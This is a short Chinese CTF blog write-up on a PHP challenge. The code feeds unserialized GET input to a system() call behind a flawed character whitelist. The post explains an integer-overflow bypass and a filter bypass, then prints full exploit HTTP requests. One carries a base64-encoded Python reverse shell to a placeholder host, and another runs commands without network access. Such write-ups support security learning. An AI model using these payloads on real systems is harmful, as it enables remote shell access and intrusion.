c1ay's blog

ctf记录记一次简单的命令执行绕过

字数统计: 469阅读时长: 2 min
2021/12/30 Share

ctf记录记一次简单的命令执行绕过

环境没了,直接贴代码吧,最近帮人看的一道题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
error_reporting(0);
highlight_file(__FILE__);
class Protect{
public $id;
}
if($protect=unserialize($_GET["bypass"])){
$id[++$protect->id]=1;
if($id[]=1){
$protect->id+=1;
echo $protect->id;
}else{
echo "success!";
if(isset($_POST["shell"])) {
$command = base64_decode($_POST['shell']);
$whitelists = str_split('<$ {}\\#()\'0');
$cmd_char_list = str_split($command);
foreach($cmd_char_list as $c){
if(in_array($c, $whitelists)){
system($command);
} else {
die("No, No way!");
}
}
}
}
} else {
die("Try hard!");
}
?> Try hard!

有2处考点:

1、需要进入else分支执行system,可以通过整型溢出进行绕过

2、需要执行system,首先要绕过这里的过滤

注意看这个循环:

1
2
3
4
5
foreach($cmd_char_list as $c){
if(in_array($c, $whitelists)){
system($command);
}

如果第一个字符在白名单当中,就可以执行命令

方法:

1、反弹shell:

这里可以通过传入$(command)进行执行,在linux当中,$()具有执行命令的作用

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /333.php?bypass=O%3A7%3A%22Protect%22%3A1%3A%7Bs%3A2%3A%22id%22%3Bi%3A9223372036854775806%3B%7D HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 318
shell=JChweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKCJ4eHh4Iiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsnKQ==

mark

2、不出网回显执行

\<||id

<的作用是使前面的命令出错

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /333.php?bypass=O%3A7%3A%22Protect%22%3A1%3A%7Bs%3A2%3A%22id%22%3Bi%3A9223372036854775806%3B%7D HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
shell=XDx8fGlk

mark

CATALOG
  1. 1. ctf记录记一次简单的命令执行绕过